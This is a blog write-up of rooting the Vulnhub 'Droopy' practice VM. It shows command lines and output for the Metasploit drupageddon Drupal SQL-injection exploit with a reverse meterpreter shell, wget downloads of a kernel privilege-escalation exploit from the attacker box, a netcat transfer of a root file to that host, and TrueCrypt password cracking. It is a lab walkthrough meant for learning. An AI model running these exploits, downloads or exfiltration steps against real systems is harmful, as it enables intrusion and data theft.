Bringing Droopy To Life

Hi there!!!
It was time to deal with Droopy VM hosted on Vulnhub. It was interesting in many ways and made me learn some important things. Here are the things I tried to get root on the VM. My attacker kali box was set to 192.168.56.102.

Once the VM is up and run the nmap scan on the subnet in which you have put the VM to identify its IP address.

root@kali:~# nmap -n -Pn -v 192.168.56.0/24

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-22 12:16 EDT
Initiating ARP Ping Scan at 12:16
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 12:16, 1.97s elapsed (255 total hosts)
Initiating SYN Stealth Scan at 12:16
Scanning 3 hosts [1000 ports/host]
Discovered open port 80/tcp on 192.168.56.104
Completed SYN Stealth Scan against 192.168.56.104 in 0.19s (2 hosts left)
Completed SYN Stealth Scan against 192.168.56.100 in 7.04s (1 host left)
Completed SYN Stealth Scan at 12:16, 7.14s elapsed (3000 total ports)
Nmap scan report for 192.168.56.104
Host is up, received arp-response (0.00047s latency).
Not shown: 999 closed ports
Reason: 999 resets
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:07:EC:AC (Oracle VirtualBox virtual NIC)

Initiating SYN Stealth Scan at 12:16
Scanning 192.168.56.102 [1000 ports]
Completed SYN Stealth Scan at 12:16, 0.06s elapsed (1000 total ports)
Read data files from: /usr/bin/../share/nmap
Nmap done: 256 IP addresses (3 hosts up) scanned in 9.51 seconds
           Raw packets sent: 6509 (278.268KB) | Rcvd: 3019 (124.776KB)
root@kali:~#

So, we now have our target’s IP Address and we see port 80 open on the target. Browsing through the site on port 80 reveals, what looks like a Drupal site.

1

Reading through the view-source of the page reveals a modules directory.

head profile="http://www.w3.org/1999/xhtml/vocab">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="http://192.168.56.104/misc/favicon.ico" type="image/vnd.microsoft.icon" />
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
  <title>Welcome to La fraude fiscale des grandes sociétés | La fraude fiscale des grandes sociétés</title>
  <style type="text/css" media="all">@import url("http://192.168.56.104/modules/system/system.base.css?ngf65y");
@import url("http://192.168.56.104/modules/system/system.menus.css?ngf65y");
@import url("http://192.168.56.104/modules/system/system.messages.css?ngf65y");
@import url("http://192.168.56.104/modules/system/system.theme.css?ngf65y");</style
<style type="text/css" media="all">@import url("http://192.168.56.104/modules/comment/comment.css?ngf65y");

Browsing through the modules directory and than to blog directory shows some interesting files.

2

The blog.info file has contents shown below which reveals the Drupal version and update date.

name = Blog
description = Enables multi-user blogs.
package = Core
version = VERSION
core = 7.x
files[] = blog.test

; Information added by Drupal.org packaging script on 2014-07-24
version = "7.30"
project = "drupal"
datestamp = "1406239730"

With this information we now search to see if we can find some exploits related to this version of Drupal. The  search shows 4 SQLi vulnerabilities.

root@kali:~# searchsploit drupal 7.3
------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                    |  Path
                                                                                                                | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------------------------------ ----------------------------------
Drupal 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (1)                                                         | ./php/webapps/34984.py
Drupal 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (2)                                                         | ./php/webapps/34992.txt
Drupal 7.32 - SQL Injection (PHP)                                                                                 | ./php/webapps/34993.php
Drupal < 7.32 - Unauthenticated SQL Injection                                                                     | ./php/webapps/35150.php
Drupal < 7.34 - Denial of Service                                                                                 | ./php/dos/35415.txt
------------------------------------------------------------------------------------------------------------------ ----------------------------------
root@kali:~#

I went on to start metasploit and search Drupal exploit. It reveals drupageddon exploit which perfectly match our needs.

msf > search drupal
[!] Module database cache not built yet, using slow search

Matching Modules
================
   Name                                           Disclosure Date  Rank       Description
   ----                                           ---------------  ----       -----------   auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Drupal OpenID External Entity Injection
   auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Drupal Views Module Users Enumeration
   exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
   exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Drupal CODER Module Remote Command Execution
   exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Drupal RESTWS Module Remote PHP Code Execution
   exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution

msf >

Let’s load the exploit and fire it on our target. We see that we have a meterpreter shell on port 443 as my payload was meterpreter/reverse_https.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > set rhost 192.168.56.104
rhost => 192.168.56.104
msf exploit(drupal_drupageddon) > exploit

[*] [2016.10.23-01:49:27] Started reverse TCP handler on 192.168.56.102:443
[*] [2016.10.23-01:49:27] Testing page
[*] [2016.10.23-01:49:27] form_build_id: form-ssrGRu8SjQkDej4iMqKw1BWsjj80H-mRseruHJtmCAo
[*] [2016.10.23-01:49:27] form_token:
[*] [2016.10.23-01:49:27] password hash: $P\$8mXsPjjln6.vJI2.WUt/WaM5H7N0HC.
[*] [2016.10.23-01:49:27] Creating new user ZSXdhIILHk:JWVLiTuClN
[*] [2016.10.23-01:49:27] Logging in as ZSXdhIILHk:JWVLiTuClN
[*] [2016.10.23-01:49:27] cookie: SESS3eb28b0d019dcab2f9875b3202ac4a41=5ScHJZVRyRsyUICX-0wJvYLeV12HUwUD3YZ0Y59Cyj4;
[*] [2016.10.23-01:49:27] Trying to parse enabled modules
[*] [2016.10.23-01:49:28] form_build_id: form-eXbf0AjAoBl3w2xFBKqVBCt9G0nBPEHQw7DHYieB40U
[*] [2016.10.23-01:49:28] form_token: lmmJjwxJH5Yp6tsBVpQsTJ_NUYWyY8IlVxX1UAtfcrQ
[*] [2016.10.23-01:49:28] Enabling the PHP filter module
[*] [2016.10.23-01:49:30] Setting permissions for PHP filter module
[*] [2016.10.23-01:49:31] form_build_id: form-PDYNDiAC2NeE_Zg1uMNNM65C3E3wzlqsjSPFs0Yv3oA
[*] [2016.10.23-01:49:31] form_token: zV_dO-5bMCK-iakZRyIq6fVvO4sJnkZwFkcKefTJ0VU
[*] [2016.10.23-01:49:31] admin role id: 3
[*] [2016.10.23-01:49:31] Getting tokens from create new article page
[*] [2016.10.23-01:49:31] form_build_id: form-mDiJpvdoortY-e1GqzeFNvmpwJu9Co5MAs7AaKlJYy8
[*] [2016.10.23-01:49:31] form_token: QU7edfdjd6FOJo-CrYhw-skiIELvkMflDgS0r9RznDE
[*] [2016.10.23-01:49:31] Calling preview page. Exploit should trigger...
[*] [2016.10.23-01:49:31] Encoded stage with php/base64
[*] [2016.10.23-01:49:31] Sending encoded stage (45098 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:443 -> 192.168.56.104:59355) at 2016-10-23 01:49:33 -0400
[-] The 'stdapi' extension has already been loaded.

meterpreter >

We now execute the shell command to get remote shell and make it interactive using python one liner.

meterpreter > shell
Process 1176 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@droopy:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@droopy:/var/www/html$

Now it was time for some enumeration to escalate our privileges to root. Searching some usual locations for some clues, we find that we can read a mail for www-data user.

www-data@droopy:/var/www/html$ cat /var/mail/www-data
cat /var/mail/www-data
From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave
www-data@droopy:/var/www/html$

Interesting!! It reveals existence of an encrypted file which we will need to decrypt and proceed further. Having this info, I set myself to search this file but did not find anything interesting after some frustrating hours of search. I tried to search for string that may have following words to tried and locate the file – Dave, George, password etc. I also searched for recently update files and files edited on 14 Apr 2016 as the mail was sent on the same date.

I finally gave up on this course and started some more enumeration using a python script. I usually use this script to automate some of the enumeration process and save time.
After downloading the script on my system and than on to the target, I ran the python script.

www-data@droopy:/var/www/html$ cd /tmp/
cd /tmp/
www-data@droopy:/tmp$ wget http://192.168.56.102:8000/lpe.py
wget http://192.168.56.102:8000/lpe.py
--2016-10-23 12:38:39--  http://192.168.56.102:8000/lpe.py
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K) [text/plain]
Saving to: 'lpe.py'

100%[======================================>] 25,304      --.-K/s   in 0.03s  

2016-10-23 12:38:39 (721 KB/s) - 'lpe.py' saved [25304/25304]

www-data@droopy:/tmp$ python lpe.py > lpe.txt
python lpe.py > lpe.txt
www-data@droopy:/tmp$

It did not reveal anything interesting other than an older kernel version which you can get using the below command.

www-data@droopy:/tmp$ uname -a
uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@droopy:/tmp$

I started googling for some exploit for this kernel and download the 64 bit exploit from this location. I compiled the exploit on my kali VM and downloaded it to the target machine and ran the exploit only to see it fail :(.

www-data@droopy:/tmp$ wget http://192.168.56.102:8000/ofc_64
wget http://192.168.56.102:8000/ofc_64
--2016-10-23 12:47:07--  http://192.168.56.102:8000/ofc_64
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12036 (12K) [application/octet-stream]
Saving to: 'ofc_64'

100%[======================================>] 12,036      --.-K/s   in 0s     

2016-10-23 12:47:07 (48.9 MB/s) - 'ofc_64' saved [12036/12036]

www-data@droopy:/tmp$ chmod +x ofc_64
chmod +x ofc_64
www-data@droopy:/tmp$ ls -l
ls -l
total 116
-rw-r--r-- 1 www-data www-data 25304 Oct 16 11:20 lpe.py
-rw-r--r-- 1 www-data www-data 75868 Oct 23 12:39 lpe.txt
-rwxr-xr-x 1 www-data www-data 12036 Oct 16 10:33 ofc_64
www-data@droopy:/tmp$ ./ofc_64
./ofc_64
bash: ./ofc_64: No such file or directory
www-data@droopy:/tmp$

At this time I had no idea what I should be doing next. After some breaks and some thinking on this I realized the mistake that I had made. I had compiled and the program on kali VM instead of the target which may have been the reason for its failure. So, I went back to download the source on target and compile it there and run and finally I had the root shell :).

www-data@droopy:/tmp$ wget http://192.168.56.102:8000/ofc_64.c
wget http://192.168.56.102:8000/ofc_64.c
--2016-10-23 12:51:43--  http://192.168.56.102:8000/ofc_64.c
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: 'ofc_64.c'

100%[======================================>] 5,123       --.-K/s   in 0.07s  

2016-10-23 12:51:43 (74.8 KB/s) - 'ofc_64.c' saved [5123/5123]

www-data@droopy:/tmp$ gcc ofc_64.c -o ofc_64
gcc ofc_64.c -o ofc_64
www-data@droopy:/tmp$ ls -l
ls -l
total 128
-rw-r--r-- 1 www-data www-data 25304 Oct 16 11:20 lpe.py
-rw-r--r-- 1 www-data www-data 75868 Oct 23 12:39 lpe.txt
-rwxr-xr-x 1 www-data www-data 13685 Oct 23 12:52 ofc_64
-rw-r--r-- 1 www-data www-data  5123 Oct 16 10:33 ofc_64.c
www-data@droopy:/tmp$ ./ofc_64
./ofc_64
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#

Now it was time to get the flag as usual, but no there is no flag in the root directory. Instead we have a file which appears to be the one mentioned in the mail.

# ls -l /root/
ls -l /root/
total 5124
-rw-r--r-- 1 root root 5242880 Apr 12  2016 dave.tc
#

I copied the file over to my kali VM using nc.

# /bin/nc 192.168.56.102 4444 < /root/dave.tc
/bin/nc 192.168.56.102 4444 < /root/dave.tc
#

root@kali:~/research/droopy# nc -lvp 4444 > dave.tc
listening on [any] 4444 ...
192.168.56.104: inverse host lookup failed: Unknown host
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.104] 58414
root@kali:~/research/droopy# ls -l
total 5264
---[redacted]---
-rw-r--r-- 1 root root 5242880 Oct 23 02:30 dave.tc
---[redacted]---
-rw-r--r-- 1 root root     656 Oct 16 13:46 mail
root@kali:~/research/droopy#

It was time to crack the trucrypt encrypted file. The password probably has word ‘academy’ in it so let’s grab rockyou.txt with word academy and prepare us a wordlist and use it to crack the file.

root@kali:~/research/droopy# grep -i 'academy' /usr/share/wordlists/rockyou.txt > academy.txt

Initially I thought truecrack would automatically detect the Key Derivation Function. So, I let it run with default ripemd160, but it came back empty. I used below command.

truecrack -t dave.tc -w academy.txt

Next I try to mutate the academy pass list with john by specifying all the rules, but that did not help as well. Below was the command that I had used to mutate the pass list

john --wordlist=academy.txt --rules –stdout >> acad.mutated

Having failed with this as well, I turned to changing the Key Derivation Function to sha512 which worked.

root@kali:~/droopy# truecrack -k sha512 -t dave.tc -w academy.txt
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
Found password:                       "etonacademy"
Password length:            "12"
Total computations:       "120"

Having found the password, it was time to open the dave.tc file. It was done with below command.

root@kali:~/research/droopy# cryptsetup --type tcrypt open dave.tc dave
Enter passphrase:
root@kali:~/research/droopy#

This will than show up as a drive in the explorer. After you access the drive it will appear in the /media folder as shown below.

root@kali:~/research/droopy# ls -laR /media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/
/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/:
total 20
drwxr-xr-x  6 root root  1024 Apr 12  2016 .
drwxr-x---+ 3 root root  4096 Oct 25 09:04 ..
drwxr-xr-x  2 root root  1024 Apr 12  2016 buller
drwx------  2 root root 12288 Apr 12  2016 lost+found
drwxr-xr-x  2 root root  1024 Apr 12  2016 panama
drwxr-xr-x  3 root root  1024 Apr 12  2016 .secret

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/buller:
total 11
drwxr-xr-x 2 root root 1024 Apr 12  2016 .
drwxr-xr-x 6 root root 1024 Apr 12  2016 ..
-rw-r--r-- 1 root root 8393 Oct  4  2013 BullingdonCrest.jpg

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/lost+found:
total 13
drwx------ 2 root root 12288 Apr 12  2016 .
drwxr-xr-x 6 root root  1024 Apr 12  2016 ..

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/panama:
total 52
drwxr-xr-x 2 root root  1024 Apr 12  2016 .
drwxr-xr-x 6 root root  1024 Apr 12  2016 ..
-rw-r--r-- 1 root root 49257 Jun 15  2014 shares.jpg

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/.secret:
total 64
drwxr-xr-x 3 root root  1024 Apr 12  2016 .
drwxr-xr-x 6 root root  1024 Apr 12  2016 ..
-rw-r--r-- 1 root root 61118 Feb 25  2016 piers.png
drwxr-xr-x 2 root root  1024 Apr 12  2016 .top

/media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/.secret/.top:
total 3
drwxr-xr-x 2 root root 1024 Apr 12  2016 .
drwxr-xr-x 3 root root 1024 Apr 12  2016 ..
-r-------- 1 root root  872 Apr 12  2016 flag.txt
root@kali:~/research/droopy#

It has some cool images which you should check out and the flag 🙂

root@kali:~/research/droopy# cat /media/root/bae6055a-68b7-42ad-8a0d-4b25c6295c20/.secret/.top/flag.txt

##########################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################


Firstly, thanks for trying this VM. If you have rooted it, well done!


Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare
root@kali:~/research/droopy#

Takeaways:

  • Persistence, never give up.
  • Pay attention to even the smallest details, if something fails try its variants before moving on.

Finally thanks knightmare and Vulnhub for this VM!!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s